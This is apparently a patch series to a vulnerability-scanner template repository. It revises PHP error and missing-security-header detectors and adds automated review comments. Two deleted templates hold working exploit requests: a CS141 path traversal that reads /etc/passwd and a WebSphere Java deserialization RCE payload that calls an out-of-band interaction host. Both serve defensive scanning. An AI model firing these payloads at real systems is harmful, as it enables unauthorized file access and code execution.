diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index ee5dd415b7..bf1abb9b15 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -1,7 +1,7 @@ id: CVE-2017-18638 info: - name: Graphite "graphite.composer.views.send_email" SSRF + name: Graphite 'graphite.composer.views.send_email' SSRF author: huowuzhao severity: high description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. From ac4bce9ca58ceecde41e9d999d4008d740bd17a2 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 11:28:42 -0500 Subject: [PATCH 29/35] Update php-errors.yaml Made better through use of regex extractors. More useful information is displayed on-screen. --- misconfiguration/php-errors.yaml | 47 ++++++++++++++++++-------------- 1 file changed, 26 insertions(+), 21 deletions(-) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index d4b4f20178..11e7defb9f 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml 
@@ -2,31 +2,36 @@ id: php_errors info: name: PHP errors - author: w4cky_ + author: w4cky_,geeknik severity: info - tags: debug + tags: debug,php requests: - method: GET path: - "{{BaseURL}}" - matchers: - - type: word - words: - - "Fatal error" - - "Call to undefined method" - - "You have an error in your SQL syntax;" - - "MySQL server version for the right syntax to use near" - - "PHP Warning" - - "PHP Error" - - "Warning: mysql_connect():" - - "Warning: mysql_query()" - - "Warning: pg_connect():" - - "failed to open stream: HTTP request failed" - - "SAFE MODE Restriction in effect." - - "Cannot modify header information" - - "ORA-00921: unexpected end of SQL command" - - "ORA-00933: SQL command not properly ended" - - "ORA-00936: missing expression" - - "ORA-12541: TNS:no listener" \ No newline at end of file + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)PHP (Warning|Error)' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)(syntax|parse) error' From d27dadb79ef4901962673a90427d47fe132911a9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:24:11 +0530 Subject: [PATCH 30/35] updated matchers --- .../http-missing-security-headers.yaml | 146 ++++++++++-------- 1 file changed, 80 insertions(+), 66 deletions(-) 
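Review bot: Replacing the word matchers with bare extractors removes all gating, and several of the new patterns are broad enough to fire on ordinary page text — `(?i)include_path`, `(?i)undefined index`, `(?i)stack trace\:`, `(?i)Debug Trace` and `(?i)(syntax|parse) error` will extract from any documentation page, forum thread or JavaScript bundle that mentions them, and every extraction is reported as a finding. Consider tying the generic ones to PHP's own output format, for example `(?i)<b>(Warning|Notice|Fatal error)</b>:` and `(?i)(Warning|Notice): .*undefined (index|variable)`, and keep the product-specific `ORA-` and `mysql_` patterns as they are. Adding `name: php-error` to the extractor and an explicit `part: body` would make the output label and scope obvious to readers.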
diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 350fcbe9db..97d80d6c05 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml 
@@ -11,103 +11,117 @@ requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 3 matchers-condition: or matchers: - - type: word - name: "Strict-Transport-Security" - words: - - "Strict-Transport-Security" - part: header + - type: regex + name: strict-transport-security + regex: + - "(?i)strict-transport-security" negative: true - - type: word - name: "Content-Security-Policy" - words: - - "Content-Security-Policy" part: header + + - type: regex + name: content-security-policy + regex: + - "(?i)content-security-policy" negative: true - - type: word - name: "X-Frame-Options" - words: - - "X-Frame-Options" part: header + + - type: regex + name: x-frame-options + regex: + - "(?i)x-frame-options" negative: true - - type: word - name: "X-Content-Type-Options" - words: - - "X-Content-Type-Options" part: header + + - type: regex + name: x-content-type-options + regex: + - "(?i)x-content-type-options" negative: true - - type: word - name: "X-Permitted-Cross-Domain-Policies" - words: - - "X-Permitted-Cross-Domain-Policies" part: header + + - type: regex + name: x-permitted-cross-domain-policies + regex: + - "(?i)x-permitted-cross-domain-policies" negative: true - - type: word - name: "Referrer-Policy" - words: - - "Referrer-Policy" part: header + + - type: regex + name: referrer-policy + regex: + - "(?i)referrer-policy" negative: true - - type: word - name: "Clear-Site-Data" - words: - - "Clear-Site-Data" part: header + + - type: regex + name: clear-site-data + regex: + - "(?i)clear-site-data" negative: true - - type: word - name: "Cross-Origin-Embedder-Policy" - words: - - "Cross-Origin-Embedder-Policy" part: header + + - type: regex + name: cross-origin-embedder-policy + regex: + - "(?i)cross-origin-embedder-policy" negative: true - - type: word - name: "Cross-Origin-Opener-Policy" - words: - - "Cross-Origin-Opener-Policy" part: header + + - type: regex + name: cross-origin-opener-policy + regex: + - "(?i)cross-origin-opener-policy" negative: true - 
- type: word - name: "Cross-Origin-Resource-Policy" - words: - - "Cross-Origin-Resource-Policy" part: header + + - type: regex + name: cross-origin-resource-policy + regex: + - "(?i)cross-origin-resource-policy" negative: true - - type: word - name: "Access-Control-Allow-Origin" - words: - - "Access-Control-Allow-Origin" part: header + + - type: regex + name: access-control-allow-origin + regex: + - "(?i)access-control-allow-origin" negative: true - - type: word - name: "Access-Control-Allow-Credentials" - words: - - "Access-Control-Allow-Credentials" part: header + + - type: regex + name: access-control-allow-credentials + regex: + - "(?i)access-control-allow-credentials" negative: true - - type: word - name: "Access-Control-Expose-Headers" - words: - - "Access-Control-Expose-Headers" part: header + + - type: regex + name: access-control-expose-headers + regex: + - "(?i)access-control-expose-headers" negative: true - - type: word - name: "Access-Control-Max-Age" - words: - - "Access-Control-Max-Age" part: header + + - type: regex + name: access-control-max-age + regex: + - "(?i)access-control-max-age" negative: true - - type: word - name: "Access-Control-Allow-Methods" - words: - - "Access-Control-Allow-Methods" part: header + + - type: regex + name: access-control-allow-methods + regex: + - "(?i)access-control-allow-methods" negative: true - - type: word - name: "Access-Control-Allow-Headers" - words: - - "Access-Control-Allow-Headers" part: header - negative: true + + - type: regex + name: access-control-allow-headers + regex: + - "(?i)access-control-allow-headers" \ No newline at end of file From da27280259b5e870d1ed11bc12e30ff6500b0621 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:26:23 +0530 Subject: [PATCH 31/35] Added stop-at-first-match --- default-logins/abb/cs141-default-login.yaml | 1 + 1 file changed, 1 insertion(+) 
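Review bot: The last matcher, `access-control-allow-headers`, ends the file without `negative: true` or `part: header` — the old word matcher's `- negative: true` is deleted and nothing replaces it, while every other regex matcher in this hunk keeps both keys as context lines. With `matchers-condition: or` that inverts the check: a response that does send Access-Control-Allow-Headers is reported under that name and one without it is not. Append `negative: true` and `part: header` to that matcher, plus a trailing newline since the hunk ends with `\ No newline at end of file`, unless a later commit in this series already restores them. The `redirects: true` addition at the top of the hunk is unrelated and fine.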
diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index cb51eede2c..531ed5ae2d 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -45,6 +45,7 @@ requests: {"userName":"guest","password":"guest"} + stop-at-first-match: true matchers-condition: and matchers: - type: word From f6c72769cee9a58a4cb3e110418008c0a8d805ba Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 3 Sep 2021 22:29:55 +0530 Subject: [PATCH 32/35] temporary moving to another branch --- cves/2020/CVE-2020-11420.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml deleted file mode 100644 index be676408b1..0000000000 --- a/cves/2020/CVE-2020-11420.yaml +++ /dev/null 
@@ -1,36 +0,0 @@
-id: CVE-2020-11420
-
-info:
- name: ABB UPS Adapter CS141 – Path traversal
- author: socketz
- severity: medium
- description: |
- A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker
- with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that
- reference files and by doing this achieve access to files and directories outside the web root folder. An
- attacker may access arbitrary files and directories stored in the file system, but integrity of the files are
- not jeopardized as attacker have read access rights only. This attack is commonly known as Path
- Traversal or Directory Traversal.
- This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed,
- and then you can exploit it, before that, you should wait.
- reference:
- - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf
- tags: cve,cve2020,iot,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd"
-
- headers:
- Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol="
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "root:.*:0:0:"
- part: body
\ No newline at end of file
From 32fed54169da875c38d139b61143aa7344234ae9 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Fri, 3 Sep 2021 22:35:58 +0530
Subject: [PATCH 33/35] removing duplicate templates and few updates
---
 miscellaneous/missing-csp.yaml | 17 -----------------
 miscellaneous/missing-hsts.yaml | 17 -----------------
 .../missing-x-content-type-options.yaml | 18 ------------------
 miscellaneous/missing-x-frame-options.yaml | 19 -------------------
 .../http-missing-security-headers.yaml | 4 ++--
 5 files changed, 2 insertions(+), 73 deletions(-)
 delete mode 100644 miscellaneous/missing-csp.yaml
 delete mode 100644 miscellaneous/missing-hsts.yaml
 delete mode 100644 miscellaneous/missing-x-content-type-options.yaml
 delete mode 100644 miscellaneous/missing-x-frame-options.yaml
diff --git a/miscellaneous/missing-csp.yaml b/miscellaneous/missing-csp.yaml
deleted file mode 100644
index 0d2a7dc176..0000000000
--- a/miscellaneous/missing-csp.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: missing-csp
-info:
- name: CSP Not Enforced
- author: geeknik
- severity: info
- description: Checks if there is a CSP header
- tags: misc,generic
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- redirects: true
- matchers:
- - type: dsl
- dsl:
- - '!contains(tolower(all_headers), ''content-security-policy'')'
diff --git a/miscellaneous/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml
deleted file mode 100644
index 3f07038249..0000000000
--- a/miscellaneous/missing-hsts.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: missing-hsts
-info:
- name: Strict Transport Security Not Enforced
- author: Dawid Czarnecki
- severity: info
- description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
- tags: misc,generic
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- redirects: true
- matchers:
- - type: dsl
- dsl:
- - '!contains(tolower(all_headers), ''strict-transport-security'')'
diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml
deleted file mode 100644
index e059f4c9be..0000000000
--- a/miscellaneous/missing-x-content-type-options.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: missing-x-content-type-options
-
-info:
- name: X-Content-Type-Options unidentified
- author: G4L1T0 and @convisoappsec
- severity: info
- description: Check for X-Content-Type-Options header
- tags: misc,generic
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- redirects: true
- matchers:
- - type: dsl
- dsl:
- - '!contains(tolower(all_headers), ''x-content-type-options'')'
diff --git a/miscellaneous/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml
deleted file mode 100644
index a7bece93c3..0000000000
--- a/miscellaneous/missing-x-frame-options.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: missing-x-frame-options
-
-info:
- name: Clickjacking (Missing XFO header)
- author: kurohost
- severity: low
- tags: misc,generic
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- redirects: true
- max-redirects: 2
- matchers:
- - type: dsl
- dsl:
- - "!contains(tolower(all_headers), 'x-frame-options')"
diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml
index 97d80d6c05..aef6738399 100644
--- a/misconfiguration/http-missing-security-headers.yaml
+++ b/misconfiguration/http-missing-security-headers.yaml
@@ -2,10 +2,10 @@ id: http-missing-security-headers
 info:
 name: HTTP Missing Security Headers
- author: socketz
+ author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
 severity: info
 description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
- tags: config,headers,misconfiguration,generic
+ tags: misconfig,generic
 requests:
 - method: GET
From 735b1df1c56648acb0968bf9ef751e8bd68b3f17 Mon Sep 17 00:00:00 2001
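Review bot: The four templates deleted here each fetched `{{BaseURL}}` with `redirects: true` (missing-x-frame-options also `max-redirects: 2`) and evaluated `all_headers` on the final response, but the http-missing-security-headers hunk only rewrites `author` and `tags`; its request block lies outside the hunk, so confirm the consolidated template follows redirects too, otherwise a bare-host 301/302 whose landing page does set CSP, HSTS, X-Content-Type-Options and X-Frame-Options will be reported as missing all of them. Dropping `headers` from `tags` while keeping `misconfig,generic` also removes the only tag that grouped the header checks; if other templates are still selectable by `headers`, this one silently leaves that set. Separately, the matcher rewrite of this same file in the preceding patch of the series ends with an `access-control-allow-headers` regex matcher that, as far as that hunk shows, carries neither `negative: true` nor `part: header`, which would make that check fire when the header is present rather than absent; worth verifying against the full file before merge.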
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Fri, 3 Sep 2021 12:09:59 -0500
Subject: [PATCH 34/35] Update php-errors.yaml
---
 misconfiguration/php-errors.yaml | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml
index 11e7defb9f..02bd1efcb3 100644
--- a/misconfiguration/php-errors.yaml
+++ b/misconfiguration/php-errors.yaml
@@ -18,6 +18,7 @@ requests:
 - '(?i)Call to undefined method'
 - '(?i)You have an error in your SQL syntax'
 - '(?i)MySQL server version for the right syntax to use near'
+ - '(?i)MySQL cannot create a temporary file'
 - '(?i)PHP (Warning|Error)'
 - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
 - '(?i)failed to open stream\:'
@@ -35,3 +36,5 @@ requests:
 - '(?i)expects parameter [0-9]*'
 - '(?i)Debug Trace'
 - '(?i)(syntax|parse) error'
+ - '(?i)Allowed Memory Size of \d* Bytes Exhausted'
+ - '(?i)Maximum execution time of \d* seconds exceeded'
From a30ee89de4e745b233138b11894102b4183d949c Mon Sep 17 00:00:00 2001
From: sandeep
Date: Sat, 4 Sep 2021 14:38:33 +0530
Subject: [PATCH 35/35] temporary removal
This template requires support that will be part of next version of nuclei, as such keeping this template in PR till next nuclei release
---
 cves/2015/CVE-2015-7450.yaml | 51 ------------------------------------
 1 file changed, 51 deletions(-)
 delete mode 100644 cves/2015/CVE-2015-7450.yaml
diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml
deleted file mode 100644
index a28bfc6ead..0000000000
--- a/cves/2015/CVE-2015-7450.yaml
+++ /dev/null
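Review bot: The two patterns added at the end of the second hunk, `'(?i)Allowed Memory Size of \d* Bytes Exhausted'` and `'(?i)Maximum execution time of \d* seconds exceeded'`, use `\d*`, which also accepts zero digits, and they differ in form from the `[0-9]*` the same list already uses in `'(?i)expects parameter [0-9]*'`. The PHP messages these target always carry a number, so `\d+` pins the field without losing matches: `- '(?i)Allowed Memory Size of \d+ Bytes Exhausted'` and `- '(?i)Maximum execution time of \d+ seconds exceeded'`. Whether the older `[0-9]*` entry should be brought in line is a style choice, but mixing both spellings in one list invites drift. The enclosing `regex:` list and its `part:` setting start outside both hunks.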
@@ -1,51 +0,0 @@
-id: CVE-2015-7450
-
-info:
- name: IBM WebSphere Java Object Deserialization RCE
- author: wdahlenb
- severity: critical
- description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default)
- reference:
- - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
- - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- - https://nvd.nist.gov/vuln/detail/CVE-2015-7450
- tags: cve,cve2015,websphere,deserialization,rce
-
-requests:
- - raw:
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: text/xml; charset=utf-8
- SOAPAction: "urn:AdminService"
-
-
-
-
-
-
- rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==
- getUnsavedChanges
- {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}}
- rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=
-
-
-
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 500
-
- - type: word
- words:
- - 'SOAP-ENV:Server'
- - ''
- condition: and
-
- - type: word
- part: interactsh_protocol # Confirms the DNS Interaction
- words:
- - "dns"